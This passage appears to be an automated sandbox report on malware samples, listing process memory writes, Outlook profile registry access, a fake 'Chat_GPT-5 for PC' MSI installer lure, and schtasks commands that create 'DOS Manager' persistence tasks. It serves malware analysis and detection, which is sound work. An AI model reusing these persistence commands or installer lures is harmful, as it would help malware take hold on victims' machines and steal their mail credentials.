PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1792 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 4872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 4872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1196 wrote to memory of 1064 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Downloads\2023-11-23-07\09f3ffc4cf39c48f84b8eac7c29a49f9c1c576fd7c804a18374ee0e93d69bc37.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

"C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe"

C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

"C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe" -service -lunch

C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

"C:\Users\Admin\AppData\Local\Temp\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb993546f8,0x7ffb99354708,0x7ffb99354718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2564 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3644 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3644 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5496 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5080 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6976 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6752 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2004 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-13\" -spe -an -ai#7zMap18022:88:7zEvent14173

C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe

"C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe"

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-13\881aa4a7e41df5264bbfc6e4dab64666051de4b22dd7a5c2bcfac93f9f8fbf3c\" -spe -an -ai#7zMap21419:218:7zEvent16652

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\2023-11-23-13\881aa4a7e41df5264bbfc6e4dab64666051de4b22dd7a5c2bcfac93f9f8fbf3c\Chat_GPT-5 for PC Installation v1.1.3\GPT5 for PC Installation v1.1.3.msi"

C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe

"C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe"

C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe

"C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe"

C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe

"C:\Users\Admin\Downloads\2023-11-23-13\496bbeff36c20e17f2967fb96527b48ab329d1cac12347fdbd8692c46dd36786.exe"

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "DOS Manager" /xml "C:\Users\Admin\AppData\Local\Temp\tmpE560.tmp"

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "DOS Manager Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpE62C.tmp"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,6487493736924385495,5532841303766468101,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1

